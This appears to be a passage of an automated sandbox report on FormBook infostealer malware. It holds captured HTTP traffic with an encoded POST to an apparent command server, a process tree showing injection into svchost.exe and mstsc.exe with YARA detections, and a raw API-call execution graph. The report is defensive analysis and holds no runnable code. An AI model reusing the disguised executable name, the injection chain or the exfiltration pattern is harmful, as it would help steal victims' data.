                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crm9UGmSKpf08C3wAoPeM%2F09gSKvJtzPxskaWgjSa2cigzSTY8pZ4z9oDcb3zyg2wQLHivAoqsVBmHYZUVIse8y5cUKh9PoyxXvnmAeNWfweGgQwvpw290brO5ZfR3dZGZMHxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9393e7ad8a42eb-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                              Session ID: 35
                                              Source IP: 192.168.2.5
                                              Source Port: 49746
                                              Destination IP: 172.67.165.25
                                              Destination Port: 80
                                              Timestamp: Sep 26, 2024 15:25:06.011473894 CEST
                                              Bytes transferred: 1809
                                              Direction: OUT
                                              Data: POST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 4f 52 42 31 58 36 79 36 6d 44 50 4d 45 4f 36 56 36 77 5a 62 78 34 50 58 6f 35 32 46 4c 33 72 38 37 4d 49 77 34 45 65 59 75 70 62 6d 32 38 77 6c 62 73 69 69 34 36 37 61 53 73 4a 4e 34 67 37 51 43 57 59 33 35 58 38 52 53 49 76 41 56 34 54 35 58 61 69 57 4f 6e 76 30 50 41 59 73 4d 79 35 67 68 62 7a 44 5a 61 33 4a 36 74 62 6b 2b 34 4d 6f 4a 4b 78 78 42 71 61 78 58 76 35 5a 64 49 44 6a 45 31 38 4d 72 6f 6e 43 43 53 4d 47 52 33 4b 4b 36 34 4a 76 78 49 51 74 47 65 59 52 51 50 61 55 58 69 50 35 6c 41 6e 4d 46 4f 76 68 6c 4b 62 2b 57 71 4e 4d 4b 43 70 66 6f 30 46 50 5a 4a 49 53 70 45 44 77 4f 6d 53 66 51 74 6e 51 52 69 65 46 4a 6c 57 4f 52 47 75 74 30 30 52 66 45 4a 53 72 49 35 53 52 4b 6d 63 41 35 55 4a 7a 41 39 79 50 2b 59 4d 46 69 73 30 54 68 4b 48 6a 61 6f 41 6f 38 49 56 66 51 51 4c 78 61 75 4d 75 50 6b 35 30 73 47 78 78 4c 4d 62 6c 44 6f 6d 34 72 78 78 61 35 [TRUNCATED]
                                              Data Ascii: vf5pwn=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvDORB1X6y6mDPMEO6V6wZbx4PXo52FL3r87MIw4EeYupbm28wlbsii467aSsJN4g7QCWY35X8RSIvAV4T5XaiWOnv0PAYsMy5ghbzDZa3J6tbk+4MoJKxxBqaxXv5ZdIDjE18MronCCSMGR3KK64JvxIQtGeYRQPaUXiP5lAnMFOvhlKb+WqNMKCpfo0FPZJISpEDwOmSfQtnQRieFJlWORGut00RfEJSrI5SRKmcA5UJzA9yP+YMFis0ThKHjaoAo8IVfQQLxauMuPk50sGxxLMblDom4rxxa5xhz6FmTDEjgZMQdzA1U68jAC6rtjQ3gnjhNoxq522YAjBidpZxfy7MKRMLgExonGnqx/4rN9pj/SEssAvkKovW9YzoeHFpd7fKNO5PKUG+MANN6NfsbO2JJD7O9DenvksuIKzVEaCg7M8dVrnLTlktT/Cn6EfrIlmMVEe906pEzog2gNfHZN00Ur4bImHIZQsF/VFVh2k/rUITpoXnjBn5iY1DOz8jFpd81ajrh40tUzhqyaUeXMdHTvxChwB002LLkB8oRZAKNr+pICE7iQsnnyUE0zCKzYHtZW+IineEWEAnq4Q+DoEDr7t4UNeUwJ7bZeZm9q/sMerUm02A7ChfqYKe2lWb1S+xho65B0CnAlfo8gnMrd6P7eaEhP0GkEjwqQOEZGpOVxeskvOpSbMPtf9HI7o88hMzyDEgW/H/NebJSjXJ4e3xghuGf9VAOI01oA8F+ENgZ2jexAS9qh+lmvwotSS+F7SUHXKpATONfBv8c4PHwLojURkYg0XP1Fa+JZEJ14AU6db+aj2crxkmAbCbr+wJcjP9pxy6olaeVz+AfxCDjcg4QuTu34QsJWQIXzAkB93LBD120SY+E80vlvmynuhdMoroDoWtOAkMtOQXlG8Hjp9h/vQHzV5YURyw3SR+RwnUJl57IPBm1bY7MRVc+7jVeHny [TRUNCATED]
                                              Timestamp: Sep 26, 2024 15:25:07.010147095 CEST
                                              Bytes transferred: 752
                                              Direction: IN
                                              Data: HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:25:06 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IProemyRG98En7CWZdF5GfaX%2FSemz5Ye%2BaDogSHz%2FU3WGZsXphsfVu4nAYsd1MLoJaxK1nz%2BqW7CmqVrraUXmpxK8CCNoNnbvuyhZRFApA2N1VLsn%2BlD%2BvpUWVFo%2FsnxdOtvlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9393fb0e5918bc-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                              Target ID:0
                                              Start time:09:21:58
                                              Start date:26/09/2024
                                              Path:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
                                              Imagebase:0x10000
                                              File size:1'085'440 bytes
                                              MD5 hash:0C3D90F3A7607383E1E4A5DA779B23F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:09:21:59
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
                                              Imagebase:0x160000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:09:22:02
                                              Start date:26/09/2024
                                              Path:C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe"
                                              Imagebase:0x770000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:09:22:04
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\mstsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                              Imagebase:0xfa0000
                                              File size:1'264'640 bytes
                                              MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:6
                                              Start time:09:22:30
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:5.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:3.9%
                                                Total number of Nodes:1137
                                                Total number of Limit Nodes:52
35615 15702 35614->35615 35616 156dd 35614->35616 35617 17eec 59 API calls 35615->35617 35616->35615 35620 156ec 35616->35620 35621 732a2 35617->35621 35618 732d1 35618->35560 35712 15c18 35620->35712 35621->35618 35711 7323e ReadFile SetFilePointerEx 35621->35711 35627 733e0 35627->35560 35628->35563 35629->35564 35630->35545 35631->35556 35632->35562 35634 17da5 35633->35634 35635 17d38 __wsetenvp 35633->35635 35648 17e8c 35634->35648 35637 17d73 35635->35637 35638 17d4e 35635->35638 35647 18189 59 API calls 35637->35647 35646 18087 59 API calls 35638->35646 35641 17d56 _memmove 35641->35582 35643 17f06 35642->35643 35644 17ef9 35642->35644 35645 30f36 59 API calls 35643->35645 35644->35585 35645->35644 35646->35641 35647->35641 35649 17ea3 _memmove 35648->35649 35650 17e9a 35648->35650 35649->35641 35650->35649 35652 17faf 59 API calls _memmove 35650->35652 35652->35649 35654 15e12 CreateFileW 35653->35654 35655 4e0b1 35653->35655 35657 15e34 35654->35657 35656 4e0b7 CreateFileW 35655->35656 35655->35657 35656->35657 35658 4e0dd 35656->35658 35657->35597 35682 15c4e 35658->35682 35662 4defe 35661->35662 35663 1578b 35661->35663 35667 15e3f 2 API calls 35662->35667 35672 1581a 35662->35672 35664 15c4e 2 API calls 35663->35664 35663->35672 35665 157ad 35664->35665 35692 1538e 35665->35692 35667->35672 35669 157c4 35670 30f36 59 API calls 35669->35670 35671 157cf 35670->35671 35673 1538e 59 API calls 35671->35673 35672->35599 35674 157da 35673->35674 35695 15d20 35674->35695 35677 15c4e 2 API calls 35677->35672 35678->35602 35702 7339d 35679->35702 35681 734aa WriteFile 35681->35601 35689 15c68 35682->35689 35683 4e081 35691 15dae SetFilePointerEx 35683->35691 35684 15cef SetFilePointerEx 35690 15dae SetFilePointerEx 35684->35690 35687 15cc3 35687->35657 35688 4e09b 35689->35683 35689->35684 35689->35687 35690->35687 35691->35688 35693 30f36 59 API calls 35692->35693 35694 153a0 35693->35694 35694->35662 35694->35669 35696 15d93 35695->35696 35700 15d2e 
35695->35700 35701 15dae SetFilePointerEx 35696->35701 35698 15807 35698->35677 35699 15d66 ReadFile 35699->35698 35699->35700 35700->35698 35700->35699 35701->35700 35703 733a4 35702->35703 35704 733af 35702->35704 35709 15dae SetFilePointerEx 35703->35709 35704->35681 35706 73409 SetFilePointerEx 35710 15dae SetFilePointerEx 35706->35710 35708 73428 35708->35681 35709->35706 35710->35708 35711->35621 35713 30f36 59 API calls 35712->35713 35714 15c2b 35713->35714 35715 30f36 59 API calls 35714->35715 35716 15c37 35715->35716 35717 15632 35716->35717 35724 15a2f 35717->35724 35719 15d20 2 API calls 35722 15643 35719->35722 35721 15674 35721->35627 35723 1793a 61 API calls 35721->35723 35722->35719 35722->35721 35731 15bda 59 API calls _memmove 35722->35731 35723->35627 35725 4df95 35724->35725 35726 15a40 35724->35726 35732 66223 59 API calls 35725->35732 35726->35722 35728 4df9f 35729 30f36 59 API calls 35728->35729 35730 4dfab 35729->35730 35731->35722 35732->35728 35733 14205 35738 181a7 35733->35738 35735 1417e _memset _wcscpy 35736 141e6 Shell_NotifyIconW 35735->35736 35737 14200 35736->35737 35739 181b2 35738->35739 35740 181ba 35738->35740 35742 180d7 59 API calls _memmove 35739->35742 35740->35735 35742->35740 35743 1e70b 35746 1d260 35743->35746 35745 1e719 35747 1d27d 35746->35747 35761 1d4dd 35746->35761 35748 52a39 35747->35748 35749 529ea 35747->35749 35753 1d2a4 35747->35753 35788 8a4fb 69 API calls __cinit 35748->35788 35752 529ed 35749->35752 35757 52a08 35749->35757 35752->35753 35754 529f9 35752->35754 35759 1d594 35753->35759 35753->35761 35764 52b55 35753->35764 35773 181a7 59 API calls 35753->35773 35775 188a0 68 API calls __cinit 35753->35775 35776 186a2 68 API calls 35753->35776 35777 18620 69 API calls 35753->35777 35779 1859a 68 API calls 35753->35779 35780 1d0dc 59 API calls 35753->35780 35781 19f3a 59 API calls 35753->35781 35782 32ec0 35753->35782 35785 1cedd 60 API calls 35753->35785 35789 18bb2 68 API calls 35753->35789 35790 19e9c 60 
API calls 35753->35790 35791 66ae3 60 API calls 35753->35791 35786 8ab0f 69 API calls 35754->35786 35757->35761 35787 8afb7 69 API calls 2 library calls 35757->35787 35778 18bb2 68 API calls 35759->35778 35761->35745 35763 1d5a3 35763->35745 35792 8a866 59 API calls 35764->35792 35773->35753 35775->35753 35776->35753 35777->35753 35778->35763 35779->35753 35780->35753 35781->35753 35793 32dc4 35782->35793 35784 32ecb 35784->35753 35785->35753 35786->35761 35787->35761 35788->35753 35789->35753 35790->35753 35791->35753 35792->35761 35794 32dd0 __getstream 35793->35794 35801 33397 35794->35801 35800 32df7 __getstream 35800->35784 35802 39d8b __lock 58 API calls 35801->35802 35803 32dd9 35802->35803 35804 32e08 RtlDecodePointer RtlDecodePointer 35803->35804 35805 32de5 35804->35805 35806 32e35 35804->35806 35815 32e02 35805->35815 35806->35805 35818 38924 59 API calls __cftof_l 35806->35818 35808 32e98 RtlEncodePointer RtlEncodePointer 35808->35805 35809 32e47 35809->35808 35810 32e6c 35809->35810 35819 389e4 61 API calls 2 library calls 35809->35819 35810->35805 35813 32e86 RtlEncodePointer 35810->35813 35820 389e4 61 API calls 2 library calls 35810->35820 35813->35808 35814 32e80 35814->35805 35814->35813 35821 333a0 35815->35821 35818->35809 35819->35810 35820->35814 35824 39ef5 RtlLeaveCriticalSection 35821->35824 35823 32e07 35823->35800 35824->35823 35825 13c4b 35826 13c55 35825->35826 35827 13c73 35826->35827 35831 144cb Shell_NotifyIconW _memset 35826->35831 35829 13c7a SetCurrentDirectoryW 35827->35829 35830 13c8f 35829->35830 35831->35827 35832 47f4e 35833 47f27 35832->35833 35834 47f5d 35832->35834 35840 38ca8 58 API calls __getptd_noexit 35833->35840 35842 47fa2 RtlLeaveCriticalSection __unlock_fhandle 35834->35842 35836 47f2c 35841 38f36 9 API calls __cftof_l 35836->35841 35839 47f36 __getstream 35840->35836 35841->35839 35842->35839 35843 30d88 35845 30d9d 35843->35845 35844 30e35 CallWindowProcA 35846 30e03 35844->35846 35845->35844 35845->35846 35847 
1568a 35848 15c18 59 API calls 35847->35848 35849 1569c 35848->35849 35850 15632 61 API calls 35849->35850 35851 156aa 35850->35851 35853 156ba 35851->35853 35854 181c1 MultiByteToWideChar 35851->35854 35855 181e7 35854->35855 35856 1822e 35854->35856 35857 30f36 59 API calls 35855->35857 35858 17eec 59 API calls 35856->35858 35859 181fc MultiByteToWideChar 35857->35859 35861 18220 35858->35861 35862 178ad 59 API calls _memmove 35859->35862 35861->35853 35862->35861 35863 78b4a 35874 78aae 35863->35874 35866 78aae 74 API calls 35867 78b66 35866->35867 35868 78aae 74 API calls 35867->35868 35871 78ba6 35867->35871 35869 78b77 35868->35869 35870 78aae 74 API calls 35869->35870 35869->35871 35873 78b89 35870->35873 35872 78aae 74 API calls 35872->35873 35873->35871 35873->35872 35877 78ac1 35874->35877 35875 78b41 35875->35866 35875->35871 35876 78f48 74 API calls 35876->35877 35877->35875 35877->35876 35878 17c8f 35879 4efc4 35878->35879 35880 17ca0 35878->35880 35893 67f03 59 API calls _memmove 35879->35893 35887 17bb1 35880->35887 35883 17cac 35884 4efce 35885 181a7 59 API calls 35884->35885 35886 4efd6 35885->35886 35888 17bbf 35887->35888 35890 17be5 _memmove 35887->35890 35889 30f36 59 API calls 35888->35889 35888->35890 35891 17c34 35889->35891 35890->35883 35892 30f36 59 API calls 35891->35892 35892->35890 35893->35884 35894 14411 35895 14424 35894->35895 35900 14213 35895->35900 35899 144ba 35901 14227 Shell_NotifyIconW 35900->35901 35902 4d568 35900->35902 35901->35899 35902->35901 35903 4d571 DestroyCursor 35902->35903 35903->35901 35904 37dd3 35905 37ddf __getstream 35904->35905 35941 39f88 GetStartupInfoW 35905->35941 35908 37e3c 35910 37e47 35908->35910 36025 37f23 58 API calls 3 library calls 35908->36025 35909 37de4 35943 38cfc GetProcessHeap 35909->35943 35944 39c66 35910->35944 35913 37e4d 35914 37e58 __RTC_Initialize 35913->35914 36026 37f23 58 API calls 3 library calls 35913->36026 35965 3d752 35914->35965 35917 37e67 35918 37e73 GetCommandLineW 
35917->35918 36027 37f23 58 API calls 3 library calls 35917->36027 35984 450a3 GetEnvironmentStringsW 35918->35984 35921 37e72 35921->35918 35924 37e8d 35927 37e98 35924->35927 36028 33235 58 API calls 3 library calls 35924->36028 35994 44ed8 35927->35994 35929 37ea9 36008 3326f 35929->36008 35932 37eb1 35933 37ebc __wwincmdln 35932->35933 36030 33235 58 API calls 3 library calls 35932->36030 36014 1492e 35933->36014 35936 37ed0 35937 37edf 35936->35937 36031 334d8 58 API calls _doexit 35936->36031 36032 33260 58 API calls _doexit 35937->36032 35940 37ee4 __getstream 35942 39f9e 35941->35942 35942->35909 35943->35908 36033 33307 36 API calls 2 library calls 35944->36033 35946 39c6b 36034 39ebc InitializeCriticalSectionAndSpinCount __getstream 35946->36034 35948 39c70 35949 39c74 35948->35949 36036 39f0a TlsAlloc 35948->36036 36035 39cdc 61 API calls 2 library calls 35949->36035 35952 39c86 35952->35949 35954 39c91 35952->35954 35953 39c79 35953->35913 36037 38955 35954->36037 35957 39cd3 36045 39cdc 61 API calls 2 library calls 35957->36045 35960 39cb2 35960->35957 35962 39cb8 35960->35962 35961 39cd8 35961->35913 36044 39bb3 58 API calls 4 library calls 35962->36044 35964 39cc0 GetCurrentThreadId 35964->35913 35966 3d75e __getstream 35965->35966 35967 39d8b __lock 58 API calls 35966->35967 35968 3d765 35967->35968 35969 38955 __calloc_crt 58 API calls 35968->35969 35971 3d776 35969->35971 35970 3d7e1 GetStartupInfoW 35978 3d7f6 35970->35978 35981 3d925 35970->35981 35971->35970 35972 3d781 @_EH4_CallFilterFunc@8 __getstream 35971->35972 35972->35917 35973 3d9ed 36059 3d9fd RtlLeaveCriticalSection _doexit 35973->36059 35975 38955 __calloc_crt 58 API calls 35975->35978 35976 3d972 GetStdHandle 35976->35981 35977 3d985 GetFileType 35977->35981 35978->35975 35979 3d844 35978->35979 35978->35981 35980 3d878 GetFileType 35979->35980 35979->35981 36057 39fab InitializeCriticalSectionAndSpinCount 35979->36057 35980->35979 35981->35973 35981->35976 35981->35977 36058 39fab 
InitializeCriticalSectionAndSpinCount 35981->36058 35985 450b4 35984->35985 35986 37e83 35984->35986 36060 3899d 58 API calls 2 library calls 35985->36060 35990 44c9b GetModuleFileNameW 35986->35990 35988 450da _memmove 35989 450f0 FreeEnvironmentStringsW 35988->35989 35989->35986 35991 44ccf _wparse_cmdline 35990->35991 35993 44d0f _wparse_cmdline 35991->35993 36061 3899d 58 API calls 2 library calls 35991->36061 35993->35924 35995 44ef1 __wsetenvp 35994->35995 35999 37e9e 35994->35999 35996 38955 __calloc_crt 58 API calls 35995->35996 36004 44f1a __wsetenvp 35996->36004 35997 44f71 35998 32ed5 _free 58 API calls 35997->35998 35998->35999 35999->35929 36029 33235 58 API calls 3 library calls 35999->36029 36000 38955 __calloc_crt 58 API calls 36000->36004 36001 44f96 36002 32ed5 _free 58 API calls 36001->36002 36002->35999 36004->35997 36004->35999 36004->36000 36004->36001 36005 44fad 36004->36005 36062 44787 58 API calls __cftof_l 36004->36062 36063 38f46 8 API calls 2 library calls 36005->36063 36007 44fb9 36009 3327b __IsNonwritableInCurrentImage 36008->36009 36064 3a651 36009->36064 36011 33299 __initterm_e 36012 32ec0 __cinit 67 API calls 36011->36012 36013 332b8 _doexit __IsNonwritableInCurrentImage 36011->36013 36012->36013 36013->35932 36015 14948 36014->36015 36024 149e7 36014->36024 36016 14982 745AC8D0 36015->36016 36067 334ec 36016->36067 36020 149ae 36079 14a5b SystemParametersInfoW SystemParametersInfoW 36020->36079 36022 149ba 36023 149c2 SystemParametersInfoW 36022->36023 36023->36024 36024->35936 36025->35910 36026->35914 36027->35921 36031->35937 36032->35940 36033->35946 36034->35948 36035->35953 36036->35952 36039 3895c 36037->36039 36040 38997 36039->36040 36041 3897a 36039->36041 36046 45376 36039->36046 36040->35957 36043 39f66 TlsSetValue 36040->36043 36041->36039 36041->36040 36054 3a2b2 Sleep 36041->36054 36043->35960 36044->35964 36045->35961 36047 45381 36046->36047 36048 4539c 36046->36048 36047->36048 36049 4538d 36047->36049 36051 
453ac RtlAllocateHeap 36048->36051 36053 45392 36048->36053 36056 33521 RtlDecodePointer 36048->36056 36055 38ca8 58 API calls __getptd_noexit 36049->36055 36051->36048 36051->36053 36053->36039 36054->36041 36055->36053 36056->36048 36057->35979 36058->35981 36059->35972 36060->35988 36061->35993 36062->36004 36063->36007 36065 3a654 RtlEncodePointer 36064->36065 36065->36065 36066 3a66e 36065->36066 36066->36011 36068 39d8b __lock 58 API calls 36067->36068 36069 334f7 RtlDecodePointer RtlEncodePointer 36068->36069 36080 39ef5 RtlLeaveCriticalSection 36069->36080 36071 149a7 36072 33554 36071->36072 36073 33578 36072->36073 36074 3355e 36072->36074 36073->36020 36074->36073 36081 38ca8 58 API calls __getptd_noexit 36074->36081 36076 33568 36082 38f36 9 API calls __cftof_l 36076->36082 36078 33573 36078->36020 36079->36022 36080->36071 36081->36076 36082->36078 36083 30911 36088 41ac0 36083->36088 36086 17d2c 59 API calls 36087 30946 36086->36087 36089 3091e GetLongPathNameW 36088->36089 36089->36086 36090 11055 36095 12649 36090->36095 36093 32ec0 __cinit 67 API calls 36094 11064 36093->36094 36096 177c7 59 API calls 36095->36096 36097 126b7 36096->36097 36102 13582 36097->36102 36100 12754 36101 1105a 36100->36101 36105 13416 59 API calls _memmove 36100->36105 36101->36093 36106 135b0 36102->36106 36105->36100 36107 135bd 36106->36107 36108 135a1 36106->36108 36107->36108 36109 135c4 RegOpenKeyExW 36107->36109 36108->36100 36109->36108 36110 135de RegQueryValueExW 36109->36110 36111 13614 RegCloseKey 36110->36111 36112 135ff 36110->36112 36111->36108 36112->36111 36113 78a52 36114 3588c __crtGetStringTypeA_stat 58 API calls 36113->36114 36115 78a61 36114->36115 36116 3588c __crtGetStringTypeA_stat 58 API calls 36115->36116 36117 78a75 36116->36117 36118 3588c __crtGetStringTypeA_stat 58 API calls 36117->36118 36119 78a89 36118->36119 36121 78a9c 36119->36121 36122 78db6 36119->36122 36123 78dc3 36122->36123 36124 78dc9 36122->36124 36125 32ed5 _free 58 API calls 
36123->36125 36126 78dda 36124->36126 36127 32ed5 _free 58 API calls 36124->36127 36125->36124 36128 78dec 36126->36128 36129 32ed5 _free 58 API calls 36126->36129 36127->36126 36128->36121 36129->36128 36130 34996 36131 348a9 36130->36131 36134 348e6 _memmove 36130->36134 36132 34bad __flush 60 API calls 36132->36134 36133 34856 __ftell_nolock 58 API calls 36133->36134 36134->36131 36134->36132 36134->36133 36135 3da06 __write 60 API calls 36134->36135 36135->36134 36136 11016 36141 14ad2 36136->36141 36139 32ec0 __cinit 67 API calls 36140 11025 36139->36140 36142 30f36 59 API calls 36141->36142 36143 14ada 36142->36143 36144 1101b 36143->36144 36148 14a94 36143->36148 36144->36139 36149 14aaf 36148->36149 36150 14a9d 36148->36150 36152 14afe 36149->36152 36151 32ec0 __cinit 67 API calls 36150->36151 36151->36149 36153 177c7 59 API calls 36152->36153 36154 14b16 GetVersionExW 36153->36154 36155 17d2c 59 API calls 36154->36155 36156 14b59 36155->36156 36157 17e8c 59 API calls 36156->36157 36166 14b86 36156->36166 36158 14b7a 36157->36158 36180 17886 36158->36180 36160 14bf1 GetCurrentProcess IsWow64Process 36161 14c0a 36160->36161 36163 14c20 36161->36163 36164 14c89 GetSystemInfo 36161->36164 36162 4dbbd 36176 14c95 36163->36176 36165 14c56 36164->36165 36165->36144 36166->36160 36166->36162 36169 14c32 36172 14c95 2 API calls 36169->36172 36170 14c7d GetSystemInfo 36171 14c47 36170->36171 36171->36165 36174 14c4d FreeLibrary 36171->36174 36173 14c3a GetNativeSystemInfo 36172->36173 36173->36171 36174->36165 36177 14c2e 36176->36177 36178 14c9e LoadLibraryA 36176->36178 36177->36169 36177->36170 36178->36177 36179 